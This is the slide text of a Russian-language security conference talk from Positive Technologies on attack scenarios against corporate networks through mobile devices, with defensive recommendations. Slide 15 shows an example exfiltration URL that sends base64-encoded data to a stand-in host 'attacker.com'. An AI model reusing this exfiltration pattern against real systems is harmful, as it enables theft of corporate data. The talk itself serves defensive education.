ݺߣ
Submit Search
Варианты реализации атак через мобильные устройства
•
0 likes
•
414 views
S
SelectedPresentations
Follow
Чайкин Артем, руководитель отдела безопасности мобильных приложений, Positive Technologies
Read less
Read more
1 of 26
Download now
Download to read offline
More Related Content
Варианты реализации атак через мобильные устройства
2.
Развитие атак на
мобильных устройствах Артем Чайкин
3.
Обо мне - Руководитель
отдела безопасности мобильных приложений - SCADA Strangelove
4.
Вводные ― BYOD ― Android
(rooted / non-rooted) ― Установлено вредоносное ПО ― Устройство подключено к корпоративной сети
5.
Сценарий I
6.
Сценарий I ― Всё
плохо ― Логин-пароль хранятся в открытом тексте
7.
Сценарий I –
Что делать?
8.
Сценарий II
9.
Сценарий II
10.
Сценарий II
11.
Сценарий II
12.
Сценарий II
13.
Сценарий II
14.
Сценарий II
15.
Сценарий II http://attacker.com/?data=base64_encoded_data
16.
Сценарий II
17.
Сценарий II
18.
Сценарий II –
Что делать? ― MDM. Установка приложений из официального магазина ― Антивирусы. Поведенческий анализ ― Прецедентов не зарегистрировано. Пока
19.
Сценарий II
20.
Сценарий II
21.
Развитие атаки на
сеть
22.
Развитие атаки на
сеть
23.
Развитие атаки на
сеть
24.
Развитие атаки на
сеть
25.
Конец рассказа Спасибо за
внимание Артем Чайкин
Download